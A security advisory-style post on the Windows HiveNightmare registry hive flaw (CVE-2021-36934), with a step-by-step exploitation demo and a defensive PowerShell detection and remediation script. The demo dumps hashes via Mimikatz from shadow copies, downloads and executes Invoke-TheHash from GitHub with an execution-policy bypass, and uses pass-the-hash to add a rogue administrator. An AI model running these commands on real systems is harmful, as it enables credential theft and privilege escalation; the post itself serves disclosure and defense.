What To Know About Microsoft’s Registry Hive Flaw: #SeriousSAM

#hivenightmare / #lolwut

Jeff McJunkin*

What is it?

tl;dr — Unpatched privilege escalation in Windows 10 in nearly all supported builds.

The vulnerability (CVE-2021-36934) allows an attacker with code execution as a limited (non-administrative) user on Windows 10 (or 11) to gain administrative privileges locally, enabling any of the following follow-on attacks:

  • Stealing credential material for any logged-on users (via Mimikatz-style LSASS attacks)
  • Dumping and cracking cached domain credentials
  • Persistence on the Windows 10 machine via Silver Ticket attacks

What can we do?

There is no patch from Microsoft, but there is an available workaround:

Due to weak permissions, limited users can read the registry hive files at the following paths:

  • C:\Windows\System32\config\SAM
  • C:\Windows\System32\config\SYSTEM

Which versions of Windows 10 are affected?

Fresh installations of Windows 10 version 1809 and later appear to be vulnerable, though, strangely, fresh installations from updated Windows 10 20H1 ISOs are an exception.

How can an attacker take advantage of this flaw?

An extremely common scenario for initial access is phishing, giving an attacker control over an employee’s computer (whether it’s a laptop, desktop, virtual desktop, etc.).

```
cls
:: Running as "limiteduser", a fresh account that is not in the Administrators group:
whoami
whoami /groups
net user limiteduser

:: This system is a fresh installation of Windows 10 1809, the oldest supported Windows 10 build
ver

:: Like nearly all such builds, it has the permissions flaw of allowing limited users access to registry hives:
icacls C:\Windows\System32\config\SAM | findstr "Users"

:: Set an environment variable pointing to the latest Volume Shadow Copy (enabled by default on Windows 10 with system drives >= 128GB)
:: cmd.exe form:
set directory=\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\system32\config
:: PowerShell form:
$directory = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\system32\config"

:: Point Mimikatz at the VSS backups and filter for the Administrator user and hash
:: Other tools can do this too, or an attacker could simply exfiltrate the registry hives and use Mimikatz on their machine
:: cmd.exe form:
mimikatz "lsadump::sam /system:%directory%\system /sam:%directory%\sam" exit | findstr /c:"User : Administrator" /c:"8846"
:: PowerShell form:
.\mimikatz.exe "lsadump::sam /system:$directory\system /sam:$directory\sam" exit | findstr /c:"User : Administrator" /c:"8846"

:: AMSI is not a defense here, or in general: https://amsi.fail/
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://github.com/Kevin-Robertson/Invoke-TheHash/raw/master/Invoke-TheHash.ps1'))

Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://github.com/Kevin-Robertson/Invoke-TheHash/raw/master/Invoke-SMBExec.ps1'))

Invoke-TheHash -Type SMBExec -Target 127.0.0.1 -Username Administrator -hash 8846f7eaee8fb117ad06bdd830b7586c -Command "net user hacker TipYourWaiters /add"

Invoke-TheHash -Type SMBExec -Target 127.0.0.1 -Username Administrator -hash 8846f7eaee8fb117ad06bdd830b7586c -Command "net localgroup Administrators hacker /add"

:: Compare that to the known password of 'password' — it matches
python -c "import hashlib, binascii; print(binascii.hexlify(hashlib.new('md4','password'.encode('utf-16le')).digest()))"

icacls C:\Windows\System32\config\SAM | findstr "Users"

vssadmin list shadows | findstr "Original"
```

FAQs

Does removing the Users group permissions from the registry hives fix the issue?

No, the original permissions are kept on the Volume Shadow Copy snapshots of the filesystem (https://twitter.com/wdormann/status/1417525453116608512).

Does disabling the Volume Shadow Copy service remove all prior snapshots?

No, disabling the Volume Shadow Copy service only removes snapshots made for System Protection purposes (https://twitter.com/wdormann/status/1417547126347808774).

Which builds of Windows 10 are vulnerable by default?

Essentially, any Windows 10 build from 1809 onward is vulnerable. Some later revisions of the Windows 10 1809 ISOs have the correct, non-vulnerable permissions, however, and those permissions are preserved through further Windows updates and upgrades to later builds. I would strongly recommend treating all supported Windows 10 builds as vulnerable.

Source: https://twitter.com/jeffmcjunkin/status/1417281315016122372 and https://twitter.com/gentilkiwi/status/1417484076550873089
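The following PowerShell script is an added example written for this page; it is not code from the original post or from Jeff McJunkin. It turns the `icacls ... | findstr "Users"` check from the "What can we do?" section into a per-endpoint test of every file under System32\config (matching the BUILTIN\Users SID rather than the localized group name), lists the existing shadow copies that the FAQ above explains keep the old permissions, and with the `-Remediate` switch applies Microsoft's published workaround for CVE-2021-36934: re-enable ACL inheritance on the hive files with `icacls /inheritance:e` and delete existing shadow copies with `vssadmin delete shadows`. The `-Remediate` switch and the function names are this example's own assumptions; run it from an elevated PowerShell session.

```powershell
<#
  Added example (not from the original post): check an endpoint for the
  CVE-2021-36934 / HiveNightmare exposure and, with -Remediate, apply
  Microsoft's published workaround. Run from an elevated PowerShell session.
  The -Remediate switch and the function names are this example's own.
#>
[CmdletBinding()]
param([switch]$Remediate)

$configDir = Join-Path $env:SystemRoot 'System32\config'
$usersSid  = 'S-1-5-32-545'   # BUILTIN\Users, compared by SID to avoid locale issues

function Test-HiveExposure {
    # Return the files under System32\config whose ACL grants BUILTIN\Users ReadData.
    $readData = [System.Security.AccessControl.FileSystemRights]::ReadData
    $exposed  = @()
    foreach ($file in Get-ChildItem -LiteralPath $configDir -File) {
        $acl = Get-Acl -LiteralPath $file.FullName
        foreach ($ace in $acl.Access) {
            try {
                $sid = $ace.IdentityReference.Translate(
                    [System.Security.Principal.SecurityIdentifier]).Value
            } catch { continue }   # unresolvable account: not BUILTIN\Users
            if ($sid -eq $usersSid -and $ace.AccessControlType -eq 'Allow' -and
                ([int]($ace.FileSystemRights -band $readData)) -ne 0) {
                $exposed += $file.FullName
                break
            }
        }
    }
    return $exposed
}

function Get-ShadowCopies {
    # Existing VSS snapshots keep the ACLs the hives had when they were taken, so
    # fixing the live files is not enough while these remain (see the FAQ above).
    Get-CimInstance -ClassName Win32_ShadowCopy |
        Select-Object ID, InstallDate, DeviceObject, VolumeName
}

function Invoke-Workaround {
    # Microsoft's documented workaround: restore inherited ACLs on the hive files,
    # then delete existing shadow copies (this also removes System Restore points).
    & icacls.exe "$configDir\*.*" /inheritance:e
    & vssadmin.exe delete shadows "/for=$env:SystemDrive" /quiet
}

# --- main ---
$isAdmin = ([Security.Principal.WindowsPrincipal] `
            [Security.Principal.WindowsIdentity]::GetCurrent()
           ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if (-not $isAdmin) {
    Write-Warning 'Run elevated: listing System32\config and deleting shadow copies require admin rights.'
}

$exposed = @(Test-HiveExposure)
$shadows = @(Get-ShadowCopies)

if ($exposed.Count -eq 0) {
    Write-Host 'OK: BUILTIN\Users has no read access to the registry hives.'
} else {
    Write-Host "VULNERABLE: BUILTIN\Users can read $($exposed.Count) hive file(s):"
    $exposed | ForEach-Object { Write-Host "  $_" }
}
Write-Host "Shadow copies present on this host: $($shadows.Count)"
$shadows | Format-Table -AutoSize

if ($Remediate -and ($exposed.Count -gt 0 -or $shadows.Count -gt 0)) {
    Invoke-Workaround
    Write-Host "After remediation, exposed hive files: $(@(Test-HiveExposure).Count)"
}
```

Run it without `-Remediate` first to inventory the fleet (the live-hive result and the shadow copy count are reported separately, because a host whose live ACLs were already fixed can still be exposed through older snapshots). Deleting shadow copies also discards System Restore points, so create a fresh restore point or backup once the workaround has been applied.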

Never Waste A Crisis

Start Developing Incident Response Capabilities

Velociraptor scales nicely and allows both sweeping checks for the vulnerability and actual remediation via Microsoft’s workaround.

Other incident response tools are fine if they have the following minimum capabilities:

  • Solution scales to your number of endpoints
  • Allows for fine-grained targeting of threat hunts and actions
  • Supports on-prem, cloud-hosted, and devices outside the corporate network

* Thanks to our friend Jeff McJunkin for sharing his knowledge with the Black Hills Information Security (BHIS) community.
